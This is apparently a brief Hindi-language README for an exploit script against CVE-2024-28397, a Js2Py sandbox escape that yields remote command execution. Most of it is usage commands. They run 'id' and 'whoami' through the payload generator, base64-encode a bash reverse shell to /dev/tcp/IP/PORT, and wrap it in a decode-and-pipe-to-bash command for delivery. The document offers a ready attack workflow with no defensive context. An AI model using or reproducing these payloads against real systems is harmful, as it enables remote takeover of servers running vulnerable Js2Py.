
CVE-2024-28397 Js2Py सैंडबॉक्स एस्केप का शोषण करने के लिए JavaScript पेलोड उत्पन्न करता है, जो Python आंतरिक के संपर्क के माध्यम से रिमोट कमांड निष्पादन और रिवर्स शेल को सक्षम बनाता है।
यह स्क्रिप्ट एक JavaScript पेलोड उत्पन्न करती है जिसका मूल्यांकन Js2Py द्वारा कमजोर वातावरणों में किया जा सकता है जहां ऑब्जेक्ट रैपरों के माध्यम से Python आंतरिकताएं उजागर होती हैं।
बुनियादी कमांड निष्पादन:
python3 cve-2024-28397.py -c "id"
एक कॉम्पैक्ट एक-लाइन पेलोड उत्पन्न करें:
python3 cve-2024-28397.py -c "whoami" --compact
Base64 पेलोड उत्पन्न करें:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Js2Py पेलोड उत्पन्न करें:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
BASE64_OUTPUT को पहले चरण में उत्पन्न Base64 स्ट्रिंग से बदलें।